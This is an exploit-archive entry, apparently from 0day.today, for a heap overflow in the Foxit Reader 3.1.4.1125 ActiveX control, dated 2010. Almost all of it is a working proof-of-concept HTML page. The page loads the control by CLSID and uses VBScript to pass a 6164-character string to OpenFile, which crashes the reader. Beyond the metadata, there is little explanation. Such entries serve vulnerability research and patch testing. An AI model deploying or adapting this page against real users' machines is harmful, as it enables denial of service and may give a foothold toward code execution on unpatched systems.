Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC

2010-01-19T00:00:00
ID 1337DAY-ID-10138
Type zdt
Reporter sarbot511
Modified 2010-01-19T00:00:00

Description

Exploit for unknown platform in category dos / poc

                                        
                                            ==================================================
Foxit Reader v3.1.4.1125 ActiveX Heap Overflow PoC
==================================================

#Vendor :www.foxitsoftware.com
#tested on :[windows 7]
#Foxit Reader Version 3.1.4.1125
 
<html>
<object classid='clsid:05563215-225C-45EB-BB34-AFA47217B1DE' id='target' ></object>
<script language='vbscript'>
 
targetFile = "C:\Program Files\Foxit Software\Foxit Reader\plugins\FoxitReaderOCX.ocx"
prototype  = "Function OpenFile ( ByVal strFilePath As String ) As Boolean"
memberName = "OpenFile"
progid     = "FOXITREADEROCXLib.FoxitReaderOCX"
argCount   = 1
  
arg1=String(6164, "A")
  
target.OpenFile arg1
  
</script>



#  0day.today [2018-04-02]  #